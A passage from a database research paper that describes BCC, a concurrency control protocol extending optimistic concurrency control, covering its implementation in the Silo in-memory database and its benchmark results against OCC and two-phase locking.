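A minimal sketch of such a synchronization point (our own construction, with assumed names): new transactions are held back while a snapshot transaction waits for the active ones to drain.

```python
import threading

class SnapshotGate:
    """Admits a snapshot transaction only on a quiet point: all active
    transactions finished, no new ones started in between."""

    def __init__(self):
        self.cond = threading.Condition()
        self.active = 0
        self.snapshot_waiting = False

    def begin_normal(self):
        with self.cond:
            while self.snapshot_waiting:   # hold new transactions back
                self.cond.wait()
            self.active += 1

    def end_normal(self):
        with self.cond:
            self.active -= 1
            self.cond.notify_all()

    def begin_snapshot(self):
        with self.cond:
            self.snapshot_waiting = True
            while self.active > 0:         # drain active transactions
                self.cond.wait()
            # ... the snapshot would be taken here ...
            self.snapshot_waiting = False
            self.cond.notify_all()
            return True

# One normal transaction runs and finishes; the snapshot then proceeds
# without blocking because no transaction is active.
gate = SnapshotGate()
gate.begin_normal()
gate.end_normal()
snapshot_taken = gate.begin_snapshot()
```

The wait is bounded by the length of the in-flight transactions, which is why the cost is acceptable for the long-running read-only transactions this optimization targets.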
With the above snapshot mechanism, a read-only snapshot transaction cannot become part of the essential patterns. This can be proved by contradiction. Assume that a read-only snapshot transaction could be part of the essential patterns. Since the snapshot transaction doesn’t write any tuple, it cannot be $T_3$ in the essential patterns. Suppose the snapshot transaction is $T_2$. Then the essential pattern would be $T_1 \rightarrow T_2 \xrightarrow{rw} T_3$. In this case, $T_1$ must commit before $T_2$ takes the snapshot, and $T_3$ must commit after $T_2$ takes the snapshot. This means $T_1$ commits earlier than $T_3$, which contradicts the fact that $T_3$ is the first committed transaction in the dependency cycle. Suppose instead the snapshot transaction is $T_1$. Then the essential pattern would be $T_1 \xrightarrow{rw} T_2 \xrightarrow{rw} T_3$. The read-only snapshot transaction can only be $wr$ dependent on another transaction to form a cycle. Let the transaction that $T_1$ is $wr$ dependent on be $T_0$. $T_0$ must commit before $T_1$ starts. With our snapshot mechanism, $T_2$ and $T_3$ cannot start earlier than $T_1$. Thus $T_0$ must commit earlier than $T_3$, which contradicts the fact that $T_3$ is the first committed transaction in the dependency cycle.
With this guarantee, the database only needs to validate whether a transaction can become the essential pattern’s $T_2$ to ensure serializability. The overhead of maintaining historical anti-dependency information is avoided. Moreover, there is no need to maintain and validate the read sets of read-only snapshot transactions.
This optimization technique targets long-running read-only transactions where a short execution delay is acceptable. Users can always choose to revert to the original BCC protocol (and accept the additional overhead) if slight latency degradation is unacceptable.
4. DETAILED BCC IMPLEMENTATION
To support BCC in the database, two components must be implemented. One is a global clock to help detect data dependencies between concurrent transactions; the other is efficient management of the tuples accessed by each transaction. These two components are introduced in Section 4.1 and Section 4.2, respectively. Section 4.3 presents how to detect data dependencies and Section 4.4 discusses phantom problems. In the last part of the section we explain how a BCC database executes transactions.
4.1 Global Clock
BCC needs a global clock to help decide if a data dependency should be considered as part of the essential pattern.
Our design of the global clock relies on the following features of in-memory databases. First, to achieve good scalability, in-memory databases generate Transaction IDs (TIDs) in a decentralized way. For example, in Silo [30], which is a representative in-memory database, each TID can be divided into three parts: (1) the thread index, which denotes the database thread that generated the TID; (2) the value of the database thread’s local counter; and (3) the value of the global epoch, which is a slowly advancing global timestamp in the database. A database thread can generate a TID by reading its local counter and the global epoch without synchronization. One important property of the TIDs is that TIDs generated by the same database thread increase monotonically. However, this property doesn’t hold for TIDs generated by different database threads. Second, each tuple in the database has associated metadata recording the TID of the latest transaction that has written the tuple.
The global clock is designed as a global TID vector. The number of entries in the vector is the same as the number of available threads in the database. Each thread has a corresponding entry in the global clock, which records the thread’s most recently assigned TID. A database thread must update its entry in the global clock every time it assigns a new TID.
The database can determine the order of a global clock value and a TID in two steps. The database first finds the database thread that generated the TID. Then it compares the value in the thread’s global clock entry with the TID. The one with a smaller value happened first. The comparison process is shown in Figure 3.
Figure 3: Comparison between the global clock and a tuple’s TID.
The global clock is used in data dependency detections, which will be described in Section 4.3.
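The comparison in Figure 3 can be sketched as follows, under an assumed simplified TID layout `(thread_index, local_counter)` (a real Silo TID also carries the global epoch):

```python
def new_tid(clock, thread_idx):
    """A thread assigns a TID by bumping only its own clock entry,
    so no cross-thread synchronization is needed."""
    clock[thread_idx] += 1
    return (thread_idx, clock[thread_idx])

def tid_before(tid, clock_snapshot):
    """A TID happened before a clock snapshot iff its counter is at most
    the snapshot's entry for the generating thread. Per-thread TIDs are
    monotonic; counters of different threads are never compared."""
    thread_idx, counter = tid
    return counter <= clock_snapshot[thread_idx]

clock = [0, 0]               # one entry per database thread
t_old = new_tid(clock, 0)    # generated before the snapshot below
snapshot = list(clock)       # e.g., a transaction's Start snapshot
t_new = new_tid(clock, 1)    # generated after the snapshot
```

The key point is step two of the comparison: only the generating thread’s entry is consulted, which keeps the clock scalable.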
4.2 Transaction Data Management
BCC requires the database to keep track of each transaction’s read set and write set to detect data dependencies. In the validation phase, the database checks if the transaction’s read set has been changed and if the transaction’s write set overlaps with other concurrent transactions’ read sets. In this case, the transaction’s write set can be simply kept in the database thread’s local storage and will be released when the transaction finishes. On the other hand, the transaction’s read set must be stored in the shared memory. Next we discuss how to efficiently manage the read sets.
Organization. We use hash tables to organize the read sets, since they may be searched by multiple database threads. A common approach is to use a shared hash table to store the tuples read by each transaction, but it requires synchronization when accessing the hash table. For example, if two transactions read the same tuple, they will modify the same entry in the hash table, which must be synchronized. To ease the synchronization overhead, instead of maintaining one shared hash table across the database, each database thread maintains a separate hash table for each transaction. Each entry in the hash table contains a pointer to a tuple and the tuple’s TID. A transaction’s hash table must be kept in memory until the transaction’s concurrent peers have finished. Hash tables allocated by the same database thread are organized into a history list. Each entry in the list is a triple \(<TID, Address, Release>\), where \(TID\) specifies which transaction the hash table belongs to; \(Address\) records the hash table’s starting memory address; and \(Release\) determines when the hash table can be released.
Allocation and release. A database thread allocates a hash table when it starts a transaction \(T\). It also allocates an entry in the history list to store the hash table’s memory address and \(T\)’s TID.
The hash table’s \(Release\) is set to the maximum TID in the global clock after \(T\) finishes. In this way, any transaction that has a TID larger than the \(Release\) of \(T\)’s hash table must have started after \(T\) finished and is not concurrent with \(T\).
To release \(T\)’s hash table, the database thread must guarantee that all of \(T\)’s concurrent transactions have finished. This can be determined by checking whether the minimum TID in the global clock is larger than the hash table’s \(Release\). If the minimum TID in the global clock is larger, all the active transactions in the database must have started after \(T\) finished, and the hash table can be safely released.
The release mechanism is conservative. A transaction \(T\)’s hash table is not immediately released after \(T\)’s concurrent transactions have finished. But it guarantees safe release of each hash table without synchronizations.
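The Release bookkeeping can be sketched as follows (a simplification of ours, modeling the global clock as a plain list of per-thread TID values and ignoring the epoch):

```python
def set_release(entry, clock):
    """After T finishes: any transaction whose TID exceeds max(clock) at
    this moment must have started after T finished, so it cannot be
    concurrent with T."""
    entry["release"] = max(clock)

def can_release(entry, clock):
    """Safe once every thread's latest TID has passed Release: all active
    transactions then started after T finished."""
    return min(clock) > entry["release"]

entry = {}
set_release(entry, [5, 3])   # T finishes while the clock reads [5, 3]
```

The conservatism mentioned above shows in `can_release`: it waits for the slowest thread’s entry to pass Release, even if no truly concurrent transaction remains.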
Synchronizations. Since a hash table can only be modified by one database thread and is not released until all concurrent transactions have finished, the only scenario that needs synchronization is when one thread is inserting into the hash table while another one is searching the hash table for a \(rw\) dependency (i.e., \(T_1 \xrightarrow{rw} T_2\)). Without synchronization, a \(rw\) dependency that actually happened may not be detected by the searching thread, which can cause a serializability problem. Protecting the hash table with a latch can solve the problem, but it harms scalability; thus we avoid it.
We solve the problem by verifying the tuple after inserting it into the hash table. If any change has happened, a \(rw\) dependency may have been missed. Thus the database thread must discard the old tuple and re-read the tuple. This guarantees that either the \(rw\) dependency can be detected later, or the thread will read the newest tuple. The synchronization process is shown in Algorithm 2.
Algorithm 2 Hash table synchronization
1: read a tuple from database;
2: insert the tuple into the hash table;
3: while true do
4: read the same tuple from database;
5: if tuple has changed after inserting into the hash table then
6: discard the old tuple from hash table;
7: insert the new tuple into the hash table;
8: else
9: break;
10: end if
11: end while
Garbage collection. In the BCC database, a transaction \(T\)’s hash table is kept in the database until \(T\)’s concurrent transactions have finished. It is possible that some tuples stored in \(T\)’s hash table have been garbage-collected by the database when a database thread searches \(T\)’s hash table. This does not cause any problem, because the hash table contains sufficient information (the tuple’s address and the tuple’s TID) to detect the data dependency. The searching thread only needs to check whether the tuple is in the hash table; there is no need to access the content of the tuple.
4.3 Data Dependency Detection
Detect anti-dependency. The anti-dependency is detected with OCC’s criterion by checking whether T’s read set has been changed.
Detect \(wr\) and \(ww\) dependencies. The database thread first takes a snapshot of the global clock when \(T\) starts and stores the value as \(Start\) in \(T\)’s local memory. To detect \(wr\) dependencies, every time \(T\) reads a tuple \(^1\), the thread compares the tuple’s TID with \(Start\) to decide whether the TID was generated after \(Start\). If the TID was generated later than \(Start\), a \(wr\) dependency has happened. The \(ww\) dependency is detected in a similar way after \(T\) enters the validation phase: if any tuple in the transaction’s write set has a TID that was generated later than \(Start\), a \(ww\) dependency has happened.
Detect \(rw\) dependency. The database thread first takes a snapshot of the global clock when \(T\) starts and stores the value as \(Start\) in \(T\)’s local memory. The thread takes another snapshot of the global clock after \(T\) enters the validation phase and stores the value as \(End\) in \(T\)’s local memory. \(Start\) and \(End\) define the TID range of the concurrent transactions that \(T\) may be \(rw\) dependent on.
With \(Start\) and \(End\), the database thread simply goes through the other threads’ history lists and checks whether \(T\)’s write set overlaps with any hash table whose TID was generated later than \(Start\) but earlier than \(End\). If there is an overlap, a \(rw\) dependency has happened.
Since taking a snapshot of the global clock doesn’t need synchronization, it is possible that new transactions have started while the thread is taking the second snapshot. These transactions may not be considered concurrent with \(T\). This will not cause any problem. The reason is that these new transactions cannot read the tuples in \(T\)’s write set since \(T\) is in the critical section. Thus \(T\) cannot be \(rw\) dependent on them.
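The Start/End range check can be sketched as follows (our own simplification, assuming a `(thread_index, local_counter)` TID layout and modeling history lists as in-memory Python lists of `(tid, read_set)` pairs):

```python
def concurrent(tid, start_snap, end_snap):
    """TID generated later than Start but not later than End, judged only
    against the generating thread's clock entries."""
    thread_idx, counter = tid
    return start_snap[thread_idx] < counter <= end_snap[thread_idx]

def rw_dependent(write_set, history_lists, start_snap, end_snap):
    """T is rw-dependent on a concurrent reader iff T's write set overlaps
    the read-set hash table of a transaction in the Start/End range."""
    for thread_entries in history_lists:
        for tid, read_set in thread_entries:
            if concurrent(tid, start_snap, end_snap) and write_set & read_set:
                return True
    return False

start, end = [0, 2], [2, 2]       # Start/End snapshots of the clock
history = [[((0, 1), {"A"})],     # thread 0: reader (0,1) read tuple A
           [((1, 2), {"B"})]]     # thread 1: (1,2) predates Start
```

Only the thread-0 reader falls inside the Start/End window, so a write to A is flagged while a write to B is not.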
4.4 Phantom
The phantom problem can happen when a transaction is executing a range query while a concurrent transaction inserts a new tuple into the range. In the essential patterns, phantom can happen in two cases: (1) \(T_2\) is the read transaction and \(T_3\) is the insert transaction; and (2) \(T_1\) is the read transaction and \(T_2\) is the insert transaction. The BCC database avoids phantoms in the same way as recent in-memory OCC databases (e.g., [30, 31]) do, which is to abort the
\(^1\) The delete operation only marks a tuple as deleted without removing the tuple for snapshot transactions.
read transaction if phantom happens. In the first case, phantom will be detected in the validation of $T_2$ and $T_2$ will be aborted. In the second case, there is no need to detect $T_1 \xrightarrow{rw} T_2$ in the validation of $T_2$ since $T_1$ will be aborted when validating $T_1$.
4.5 Put Together: A Transaction’s Life
Algorithm 3 How a BCC database works in different phases
1: Transaction Start:
2: assign a TID and update the global clock;
3: take a snapshot of the global clock;
4: allocate a new hash table and release history hash tables;
5: Transaction Validation:
6: enter the critical section;
7: take a snapshot of the global clock;
8: left_conflict = right_conflict = 0;
9: if $T$ is anti-dependent on any committed transaction then
10: right_conflict = 1;
11: find concurrent transactions;
12: if $T$ is dependent on its concurrent transactions then
13: left_conflict = 1;
14: end if
15: end if
16: if right_conflict = 1 and left_conflict = 1 then
17: set the Release field of the transaction’s hash table;
18: abort the transaction;
19: else
20: install the writes and commit the transaction;
21: end if
22: leave the critical section;
With the above designs, we now illustrate how a BCC database works in different transaction execution phases. The process is shown in Algorithm 3.
When a transaction $T$ starts, the database first assigns $T$ a new TID and updates the corresponding entry in the global clock. Then the database takes a snapshot of the global clock, which serves multiple purposes. First, it is used to help determine the concurrent transactions for the later validation. Second, it is used to set the Release field of the previous transaction’s hash table to the maximum TID value in the global clock. Third, it is used to release unused history hash tables by finding the minimum TID in the global clock and releasing all hash tables whose Release is smaller than the minimum TID. The database also allocates a new hash table for the transaction.
When the transaction enters the validation phase, the database first takes a snapshot of the global clock, which is used together with the clock snapshot taken in line 3 to determine the concurrent transactions. Then the database checks whether $T$ is anti-dependent on any committed transaction. If no anti-dependency exists, $T$ will be committed since no essential pattern can be created. Otherwise, the database checks whether $T$ is dependent on any of its concurrent transactions. This requires the database to find all the transactions that are concurrent with $T$ and check the data dependencies between them. The data dependencies are checked in the order of $wr$, $ww$ and $rw$. If any data dependency is detected, the transaction will be aborted. The database will also set the Release of the aborted transaction’s hash table such that the hash table can be immediately released. Otherwise, the transaction will be committed.
5. EXPERIMENTAL METHOD
To evaluate BCC’s effectiveness, we have implemented BCC and two-phase locking (2PL) in Silo [30], which is a multi-threaded, shared-memory in-memory OCC database. Silo generates TIDs in a decentralized way. It maintains a thread-local read set and write set for each transaction. Tuples in the transaction’s write set are locked in a deterministic order before validation starts. After that, Silo assigns a TID to the transaction if the transaction writes to the database and validates the transaction using OCC’s criterion.
5.1 Silo With BCC
Multi-Level Circular Buffers. Each thread in the BCC database requires a memory space to store history hash tables, which may be allocated, released, and checked frequently. It is necessary to manage this memory space efficiently.
One way to manage the space is to organize it as a single region and use a free list to record the memory blocks available for new allocations. However, this approach would incur serious cache misses when each newly allocated hash table is filled with read sets. This problem can be addressed by utilizing two special characteristics of BCC thread’s memory operations: (1) the hash tables are always released in the same order as they are allocated; (2) the memory demand of each thread for storing history hash tables is usually low, and only occasionally jitters to its maximum requirement (Section 6.3).
In our implementation, each thread partitions its memory space into three smaller areas that are managed with three levels of circular buffers. The lowest-level circular buffer is the smallest and can fit into the L1 CPU cache; the next one is slightly larger but is smaller than the L2 cache; the highest-level buffer is the largest one and can be any size that satisfies the maximum memory requirement of a thread. The database thread always tries to allocate memory from a lower-level circular buffer, and only resorts to a higher one when the lower buffer space becomes depleted. In each circular buffer, the memory is always allocated and released in a chase-tail fashion. Since most OLTP transactions are short and the average memory requirement of each database thread is low, this design ensures that most hash table operations can be satisfied in the L1 or L2 (or even L3) CPU cache.
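A minimal sketch of this three-level scheme follows. Names and default sizes are illustrative; the real buffers are rings sized to the CPU caches, and this toy model tracks only free space, ignoring wrap-around fragmentation.

```python
from collections import deque

class MultiLevelBuffer:
    """Toy model of the three-level circular-buffer scheme: allocate from the
    lowest (most cache-friendly) level with room, fall back to a higher level,
    and release allocations strictly in allocation order (chase-tail)."""
    def __init__(self, sizes=(32 << 10, 256 << 10, 4 << 20)):
        self.free = list(sizes)      # remaining bytes per level
        self.fifo = deque()          # (level, size), oldest allocation first

    def alloc(self, size):
        for level, avail in enumerate(self.free):
            if size <= avail:
                self.free[level] -= size
                self.fifo.append((level, size))
                return level
        raise MemoryError("exceeds maximum per-thread history space")

    def release_oldest(self):
        # Hash tables are always released in the order they were allocated.
        level, size = self.fifo.popleft()
        self.free[level] += size
        return level
```

The FIFO release order is what makes the chase-tail ring layout possible: freed space always reopens contiguously behind the allocation cursor.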
Global clock. We implement the global clock as a set of sub-vectors. The number of sub-vectors equals the number of CPU sockets, and each sub-vector is a contiguous array aligned on a cache line on its socket.
TID generation. We use Silo’s distributed TID generator to generate TIDs for every transaction. The original Silo only assigns TIDs to transactions that write to the database. We modify the TID generator such that every transaction will be assigned a TID. Every time a database thread generates a TID, it will update its entry in the global clock. For each database thread, we use the last TID generated by the thread to identify the current transaction’s hash table since Silo generates TIDs in the validation phase.
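The interplay of the global clock, per-thread TID publication, and the two snapshots taken at transaction begin and at validation can be modeled as follows. This is a toy sketch; the per-socket, cache-line-aligned layout and atomicity concerns are elided, and all names are invented for illustration.

```python
class GlobalClock:
    """Toy model of the distributed global clock: one entry per thread,
    grouped into per-socket sub-vectors (here simply nested lists)."""
    def __init__(self, sockets, threads_per_socket):
        self.vec = [[0] * threads_per_socket for _ in range(sockets)]

    def publish(self, socket, thread, tid):
        # Called by a thread each time it generates a TID for a transaction.
        self.vec[socket][thread] = tid

    def snapshot(self):
        # Taken at transaction begin and again at validation; together the
        # two snapshots bound the set of concurrent transactions.
        return [row[:] for row in self.vec]

def concurrent_tids(snap_begin, snap_validate):
    """Per-thread (exclusive, inclusive) TID ranges whose transactions ran
    concurrently with the observing transaction."""
    return [(b, v)
            for rb, rv in zip(snap_begin, snap_validate)
            for b, v in zip(rb, rv) if v > b]
```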
Snapshot transactions. We add a synchronization point in the database before a snapshot transaction begins. After the synchronization, the database first advances the global epoch and then starts executing transactions. The snapshot is created based on the current Epoch value. Only tuples written in the previous Epoch can be read by the snapshot transactions.
5.2 Silo With 2PL
Our 2PL implementation is motivated by [25]. We avoid a centralized lock manager, which yields suboptimal performance. Instead, we implement per-tuple locks, associating each tuple with a shared read lock and an exclusive write lock. No lock lists are used. To avoid deadlock-detection overhead, we adopt the wait-die 2PL mechanism [27]. A global timestamp allocator, implemented as an atomic variable, assigns a timestamp to each transaction to establish transaction precedence.
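A sketch of the per-tuple wait-die decision, assuming timestamps come from the atomic global allocator (smaller timestamp = older transaction); `TupleLock` and its method names are illustrative, not from our actual implementation:

```python
class TupleLock:
    """Per-tuple shared/exclusive lock with wait-die deadlock avoidance:
    on conflict, an older requester may wait; a younger one dies (aborts)."""
    def __init__(self):
        self.readers = set()   # timestamps holding the shared read lock
        self.writer = None     # timestamp holding the exclusive write lock

    def acquire_read(self, ts):
        if self.writer is None:
            self.readers.add(ts)
            return "granted"
        return "wait" if ts < self.writer else "die"

    def acquire_write(self, ts):
        holders = self.readers | ({self.writer} if self.writer is not None else set())
        conflicting = holders - {ts}      # permit lock upgrade by the same txn
        if not conflicting:
            self.writer = ts
            return "granted"
        # Older than every holder -> allowed to wait; otherwise abort.
        return "wait" if all(ts < h for h in conflicting) else "die"
```

Because waiting is only ever permitted in one timestamp direction, no cycle of waiting transactions can form, so no deadlock detector is needed.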
5.3 Experimental Setup
All experiments are conducted on a 32-core machine with four 2.13GHz Intel Xeon E7-8830 CPUs and 128GB memory. Hyper-threading is disabled to yield the best base performance of Silo [30]. The operating system is 64-bit Linux with 2.6.32 kernel. The version of GCC compiler is 4.8.2.
To avoid stalls due to user interaction, no network clients are involved in our experiments. Each database thread runs on a dedicated CPU core and has a local workload generator that produces its input transactions. Database logging is disabled. All table data reside in main memory and no disk activity occurs during measurements. For each measurement, we run the experiment 10 times, each run lasting 30 seconds, and report the median results.
6. EXPERIMENT RESULTS
In this section we present the performance results of BCC, OCC, and 2PL based on the prototype implementation in Silo. The experiment results confirm our expectations for BCC performance as follows:
- **BCC achieves comparable performance and scalability with OCC when the workload contention is low** (Section 6.1).
- **BCC significantly improves transaction throughput for high-contention workloads**: BCC improves the throughput by 3.68x over OCC and by 2x over 2PL (Section 6.2).
- **BCC’s overhead on memory consumption and increased transaction latency is acceptable** (Section 6.3).
The performance results demonstrate BCC's usefulness in practice: it provides good performance in both low-contention and high-contention scenarios.
6.1 Low Contention
We first evaluate how BCC performs when data contention is low. TPC-C [1] and YCSB [7] benchmarks are used in the experiments. Due to limited space, we only present TPC-C’s results here. YCSB’s results are similar.
TPC-C. TPC-C is an industry-standard benchmark for evaluating transaction database performance. It models the operations in a wholesale store that consists of a number of warehouses. In the Silo implementation, TPC-C tables are partitioned across the warehouses. We set the number of warehouses (i.e., the scale factor) to be the same as the number of database threads. In this configuration, each thread mostly operates on the data items in its own warehouse, which makes data contention rare.
Figure 4 shows the transaction throughputs achieved by BCC, OCC and 2PL as the number of threads increases. As can be seen from the figure, BCC performs comparably to OCC and scales near-linearly for the TPC-C workload. With 32 threads, BCC delivers an overall throughput of 1.15M transactions per second, which is only 7.29% lower than that achieved by OCC (1.24M). Despite the extra operations BCC introduces for detecting the essential patterns, the inter-core communication induced by checking history hash tables is rare when data contention is low. This keeps BCC's overhead low, retaining OCC's performance benefits for low-contention workloads.
To better understand the causes of BCC's slight overhead relative to OCC, we further break down BCC's slowdown at 32 threads and show how different kinds of operations contribute to the throughput degradation. The result is listed in Table 1. The overhead mainly comes from two sources: memory management (Mm), which lowers throughput by 4.76%, and accessing the global clock (Clock), which contributes 2.42% to the degradation. When data contention is low, memory management operations mainly consist of maintaining the history list and allocating and releasing memory for history hash tables. In our implementation each database thread uses a small memory region on its local NUMA node to store the history list and hash tables, so no inter-core communication is needed for memory management. Since most OLTP transactions are short, the memory-management overhead should remain almost constant regardless of the number of cores on the target platform.
On the other hand, the overhead of accessing the global clock is affected by the number of sockets on the machine. This is because the global clock in BCC is implemented as a distributed vector spread among the sockets. Each database thread needs to read all the distributed vectors at the beginning of a transaction, incurring inter-socket communication. This overhead is mainly determined by the number of sockets in the machine. However, since the number of sockets in a system is typically small, we believe this overhead (only 2.42% with 4 sockets) is acceptable in practice.
Compared to 2PL, BCC achieves better performance and scalability. With 32 threads, 2PL delivers a throughput of only 0.92M transactions per second, which is 19.9% and 25.8% lower than BCC and OCC, respectively. In general, 2PL introduces extra overheads in two respects. First, 2PL incurs extra locking operations for reads compared to BCC and OCC: each read operation must acquire and release a latch-protected read lock. Second, 2PL needs a centralized timestamp allocator to accurately determine the order of transactions for deadlock avoidance, which becomes a bottleneck as the number of threads increases.
6.2 High Contention
This section compares the performance of BCC with OCC and 2PL when data contention is high. A modified TPC-W [2], TPC-C
and YCSB [7] are used in the evaluation.
TPC-W. TPC-W is a popular OLTP benchmark simulating the operations of an online bookseller. Compared with TPC-C, TPC-W has more complex read-only transactions. Since read-only transactions are executed as snapshot transactions, which Silo never aborts under either OCC or BCC, their performance is similar under both concurrency control methods. We therefore exclude them from our TPC-W experiments; otherwise they would dominate the measured system throughput.
We experiment with the two update-intensive transactions from the TPC-W benchmark: (1) DoCart adds a set of random items to the shopping cart and displays the cart; (2) OrderProcess processes a set of random orders and updates the database (e.g., updating the stock numbers of the ordered items). To simulate the high contention scenario, we use slightly modified versions of the two transactions: there is one hot item in the orders processed by each OrderProcess transaction, and each DoCart transaction has a certain probability to display the hot item. In all our experiments, we let one database thread execute the OrderProcess transactions, while all other threads execute the DoCart transaction.
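The modified DoCart item selection described above can be sketched as follows. The function and parameter names are invented for illustration and are not part of the TPC-W specification.

```python
import random

def docart_items(n_items, catalog_size, hot_item, hot_prob, rng=random):
    """Items touched by one modified DoCart transaction: a set of random
    catalog items, plus the single hot item with probability `hot_prob`."""
    items = rng.sample(range(catalog_size), n_items)  # distinct random items
    if rng.random() < hot_prob:
        items.append(hot_item)   # display the hot item OrderProcess updates
    return items
```

Setting `hot_prob` to 1.0 reproduces the highest-contention configuration; setting it to 0.0 removes the hot-item conflict entirely, matching the probability sweep in the second experiment below.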
In our first experiment, we evaluate the performance of BCC, OCC and 2PL when the DoCart transaction has the highest contention probability with the OrderProcess transaction. We set the probability of DoCart adding the hot item to 100%, and measure transaction throughputs as the number of threads varies. The result is presented in Figure 5.
It can be seen that BCC scales much better than OCC in this experiment. As the number of threads increases, BCC gains increasingly higher performance advantage. With 32 threads, BCC achieves a throughput of 1.03M transactions per second, which is 3.68x over the throughput with OCC (0.28M).
The performance improvement achieved by BCC over OCC is mainly attributed to the reduction of false-aborted DoCart transactions. We can understand this conclusion from the following observations. First, there can be no data dependencies between two DoCart transactions, because each DoCart only modifies its own private shopping cart. Second, the hot item displayed (read) by a DoCart transaction has a high probability of having been modified by an OrderProcess transaction by the time the DoCart transaction tries to commit. In this case, OCC must abort the DoCart transaction due to the appearance of an anti-dependency on a committed transaction. However, a data dependency cycle is actually unlikely to form, because the remaining tuple accesses in both DoCart and OrderProcess are random; aborting the DoCart transaction is therefore a false abort. BCC effectively reduces such false aborts by checking for one more data dependency besides the anti-dependency.
2PL performs differently. As can be seen, 2PL's throughput goes through three stages: decrease, increase, decrease. With 2PL, OrderProcess's throughput decreases as the number of threads increases, because the hot tuple is more likely to be read-locked by DoCart, which blocks OrderProcess. 2PL's throughput drops when the number of threads grows from 1 to 2 because the loss in OrderProcess's throughput exceeds the throughput added by DoCart (note that with one database thread, 2PL's throughput is OrderProcess's throughput alone). As the number of threads increases from 2 to 16, 2PL's throughput rises, because the growth in DoCart's throughput outweighs the decline in OrderProcess's. As the number of threads increases further, both DoCart's and OrderProcess's throughput fall under the high contention, so 2PL's overall throughput decreases.
BCC does not perform as well as 2PL when the number of threads is 4 or fewer. However, as the number of threads increases, BCC significantly outperforms 2PL: with 32 threads, BCC's throughput is 2.03x that of 2PL (0.5M). The performance difference is mainly determined by the relationship between 2PL's synchronization overhead and BCC's overhead for detecting essential patterns. With 32 threads, the 2PL workload is dominated by DoCart transactions, and 2PL must synchronize between threads because each one tries to add a read lock to the hot tuple. In an optimized in-memory database, this synchronization cost is non-trivial. In contrast, BCC's validation incurs no synchronization for read contention.
The above experiment demonstrates how BCC performs under the highest intensity of per-thread contention. To understand how different contention intensities affect transaction throughput, we fix the number of threads at 32 and vary the probability that DoCart adds the hot item to the shopping cart. When the probability is 100%, the setting is the same as the previous experiment at 32 threads and contention is highest. When the probability is 0%, all items in a DoCart transaction are randomly chosen and contention is lowest. The result is shown in Figure 6.
Compared to OCC, BCC performs slightly worse when the contention probability is below 10% (by up to 7.95%), due to the overhead of memory management and the inter-socket communication incurred by accessing the global clock. As the contention probability increases, the throughput of OCC drops sharply, bottoming at only 285K transactions per second when the probability reaches 100%. In contrast, BCC's throughput decreases at a much slower rate. When the contention probability is 20% or greater, BCC's benefit of reducing false aborts outweighs its overhead for detecting the essential patterns, improving the overall throughput.
We can see that 2PL has a performance trend similar to OCC's, although 2PL performs better than OCC. When the contention probability is below 40%, 2PL performs comparably to BCC. However, as the contention probability continues to increase, 2PL's performance decreases much faster than BCC's, because of 2PL's higher synchronization cost, as discussed previously.
**TPC-C.** In the TPC-C experiments we use the update-intensive transactions, *NewOrder* and *Payment*, which comprise most of the transactions in the TPC-C benchmark. We set the scale factor of TPC-C to 2 and the workload mix executed by each thread to 50% *NewOrder* and 50% *Payment*. Figure 7 shows the throughput of this TPC-C workload as we increase the number of threads.

It can be seen that BCC outperforms OCC when the number of threads exceeds the number of warehouses. With up to 16 threads, the throughputs of BCC and OCC both increase with the number of threads, but BCC scales better, improving throughput by 37% over OCC at 16 threads. As the number of threads grows beyond 16, the performance of both BCC and OCC starts degrading with similar trends, but BCC still maintains a solid improvement (up to 35.8%) over OCC. This again confirms BCC's advantage over OCC in reducing false aborts.
The transactions *NewOrder* and *Payment* in TPC-C have much more complex data dependency patterns than *DoCart* and *OrderProcess* in TPC-W do. When operating on the same warehouse, all types of data dependencies can occur between any two concurrent transactions, each of which can be either *NewOrder* or *Payment*. Thus a cycle can genuinely be created in the transaction dependency graph. For example, when two threads execute *Payment* transactions on the same warehouse, both must read and update the year-to-date payment; a dependency cycle containing *rw* and *wr* dependencies is then likely to form, and one of the *Payment* transactions is aborted by both BCC and OCC. This explains the performance decrease of both BCC and OCC when the contention becomes severe (with more than 16 threads).
BCC also performs better than 2PL, improving throughput by up to 1.84x. The poor performance of 2PL is mainly caused by its high synchronization overhead and lock-thrashing behavior. For example, when multiple database threads execute *Payment* on the same warehouse, they must acquire both the read lock and the write lock on the contended tuple. The tuple is likely to be read-locked by multiple threads, so only one thread can wait for the write lock while the rest are aborted. These aborted transactions cause unnecessary synchronization for the others, which limits the number of transactions processed by the database. We observe that with 32 threads, the total transaction throughput processed by 2PL (including both committed and aborted transactions) is 0.31M per second, significantly lower than that of BCC (0.9M).

To better understand BCC’s performance improvement over OCC and 2PL on TPC-C, we break down the overall throughput by the numbers contributed by different transaction types. The results are shown in Figure 8.
OCC, BCC and 2PL perform differently for *NewOrder* and *Payment*. OCC favors *Payment* transactions over *NewOrder* transactions, while 2PL commits many more *NewOrder* transactions than *Payment* transactions. BCC's performance for *NewOrder* and *Payment* lies in between.
Compared to OCC, BCC's performance advantage comes from the improved throughput of the *NewOrder* transaction. The reason is that many of the *rw* dependencies between *NewOrder* and *Payment* do not actually form a dependency cycle and thus suffer false aborts with OCC. Examining the additional dependencies largely avoids these aborts and thus improves the overall throughput. However, BCC cannot improve the throughput of *Payment* transactions; it even performs slightly worse than OCC here. This is because each OCC-aborted *Payment* transaction is likely to reside in a dependency cycle with another transaction of the same type (i.e., a true abort), so OCC-aborted *Payment* transactions are also aborted by BCC. In this case, BCC's effort of examining additional dependencies only increases transaction execution latency, which in turn degrades the overall throughput.
On the other hand, BCC outperforms 2PL because it performs much better on the *Payment* transactions; with 32 threads, 2PL can barely commit *Payment* transactions. 2PL's poor performance on *Payment* has two causes. First, there is read-write contention between *NewOrder* and *Payment* when they operate on the same warehouse. When the contended tuple is read-locked by a *NewOrder* transaction, other *NewOrder* transactions can continue adding read locks to the tuple while a *Payment* transaction has to wait; in this case the *Payment* transaction is likely to be aborted to avoid deadlock. Second, contention between two *Payment* transactions on the same warehouse causes *Payment* aborts, because the two transactions create a dependency cycle.
**YCSB.** The YCSB (Yahoo Cloud Serving Benchmark) benchmark [7] models workloads generated by online key-value and cloud serving stores. The benchmark contains a single table with ten string columns, populated with one million data items. Each transaction randomly accesses 16 tuples, each of which has a 20% probability of being an update. Accesses to the tuples follow a Zipfian distribution. We set the conflict factor $\theta$ to 100 to make the level of data contention high. In this case, all types of data dependencies can occur between two transactions. The results are shown in Figure 9.
